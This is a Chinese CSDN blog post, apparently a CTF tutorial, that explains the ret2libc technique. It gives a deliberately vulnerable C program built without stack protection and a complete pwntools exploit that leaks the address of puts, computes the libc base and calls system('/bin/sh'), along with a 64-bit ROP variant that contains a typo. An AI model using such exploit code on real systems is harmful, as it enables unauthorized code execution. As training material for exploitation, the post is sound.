ret2libc

最新推荐文章于 2022-04-26 21:20:01 发布
最新推荐文章于 2022-04-26 21:20:01 发布
阅读量162 收藏
点赞数
分类专栏: pwn ctf 二进制安全 文章标签: libc pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaosolll/article/details/110350619
版权
pwn 同时被 3 个专栏收录
2 篇文章 0 订阅
订阅专栏
ctf
2 篇文章 0 订阅
订阅专栏
二进制安全
2 篇文章 0 订阅
订阅专栏

ret2libc

#include <stdio.h>

int main()
{
    vuln();
}
int vuln()
{
    char v1;
    gets(&v1); // 写入到 v1
    return 0;
}
int didida()
{
    int x, y;
    fgets(x, 5, stdin);
    fgets(y, 5, stdin);
    int max;
    if (x > y | y < x)
    {
        max = x;
    }
    else
        max = y;
    puts("yyy");
    return max;
}

编译:gcc -z noexecstack -fno-stack-protector -m32 pwn22.c -o pwn22

开启nx保护,本机的aslr保护也开了,意味着libc的基地址会随着每次程序的启动而改变。

exp:

from pwn import*

context.log_level ='DEBUG'

p=process("./pwn22")

elf=ELF("./pwn22")

libc=ELF("/lib/i386-linux-gnu/libc.so.6")

puts_plt=elf.plt["puts"]

puts_got=elf.got["puts"]

puts_libc=libc.symbols["puts"]

vuln_addr=0x80484af
padding=(0x9+0x4)
payload=padding*'a'+p32(puts_plt)+p32(vuln_addr)+p32(puts_got)
p.sendline(payload)

puts_addr=u32(p.recv(4))


libcbase=puts_addr-puts_libc
system=libcbase+libc.symbols['system']
binsh=libcbase+libc.search("/bin/sh").next()

payload=padding*'a'+p32(system)+p32(0x123)+p32(binsh)

p.sendline(payload)


p.interactive()

一般在做题中,可以在"puts_addr="下面增加一个print puts_addr,然后通过后三位(后三位是固定的,我们通过后三位去libc database search (nullbyte.cat)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BuzqspUa-1606648438768)(C:\Users\86152\AppData\Roaming\Typora\typora-user-images\image-20201129185849759.png)]

去查找libc版本,将其下载。

因为每次程序的开启都会让libc的基址改变,所以我们第一次溢出利用puts函数打印出puts_got(puts的真实地址)。

因此第一次的payload:

payload=padding*'a'+p32(puts_plt)+p32(vuln_addr)+p32(puts_got)

执行完puts函数打印出puts函数的真实地址后程序ip会指向vuln_addr的地址。

如果是64位的程序,则要依靠ROPgadget来pop内容到相应寄存器。

ROPgadget --binary ./pwn22 --only "pop|ret" | grep "rdi"

payload=padding*'a'+p64(pop_rdi_ret)+p64(puts_got)++p64(puts_got)+p64(vuln_addr)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FmrM5wmu-1606648438770)(C:\Users\86152\AppData\Roaming\Typora\typora-user-images\image-20201129190755914.png)]

context.log_level =‘DEBUG’,能看到我们输出和接收到的内容。

接收到puts的真实地址后,去寻找libc版本。

将puts真实地址减去libc中puts的偏移地址,则可以得到libc的基址。

system和binsh字符串的地址都可以通过,libcbase(libc基址)+libc中system的偏移地址得到。

则第二次payload:

payload=padding*'a'+p32(system)+p32(0x123)+p32(binsh)

因为执行了binsh后我们就拿到了shell,所以system的返回地址我们可以随便写。(这里我写了p32(0x123))

jwj_tangerine
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ret2libc
钞sir的博客
01-26 8800
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
ret2libc exploit
07-07
exploit hack linux ret2libc
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
溢出实例--笔记三(ret2libc
一只青木呀
08-07 1363
溢出实例--笔记三(ret2libc)1、溢出含义及结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看结构3.3、第一次溢出3.4、第二次溢出 1、溢出含义及结构 请参考溢出实例–笔记一(ret2text) 溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
Ret2libc 1
weixin_44864859的博客
05-19 676
Ret2libc 1 题目代码和之前一样,gets函数存在溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2258
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
基本ROP之ret2libc2
至臻求学,胸怀云月
02-14 3629
原理 ret2libc即控制函数执行libc中的函数,通常是返回至某个函数plt表处或者函数的具体位置(即函数对应的got表项的内容),一般情况下我们选择执行system("/bin/sh"),故而我们需要知道system函数的地址 过程 下载地址:url checksec IDA分析 gets函数 system函数 经计算gets字符串和ebp的偏移为108,这里不进行赘述 查找bin/s...
ret2libc | by AriSan
AriSan_XD的博客
05-02 288
ret2libc | by AriSan 基本特征:程序开启了NX不可执行保护,无法执行我们注入的 shellcode 漏洞原理:在溢出的基础上,控制 libc 中的参数。通常是改变返回地址到某个函数的 plt 处,或者某个函数的具体位置(函数对应 got 表项的内容),改变寄存器的参数,达到执行system('/bin/sh')的目的 若程序提供了system()函数,我们可以直接选择返回到 ...
好好说话之ret2libc2
hollk’s blog
06-22 1213
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc2 看C代码 #include <stdio.h> #include <stdlib.h> #include <time.h> char buf2[100]; void secure(void) { int secretcode, inpu...
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8115
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
ret2libc实战
xia0ji233
05-17 419
title: ret2libc实战 date: 2021-05-13 22:00:00 tags: binary security study report ret2libc comments: true categories: ctf pwn ret2libc是一个pwner必备的基础知识。 ret2libc为return to libc的缩写,我们需要执行libc函数里面的system("/bin/sh") 下面为32位程序并且带.so文件的题目:buuctf[OGeek2019]babyrop.
pwn ret2libc原理
最新发布
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值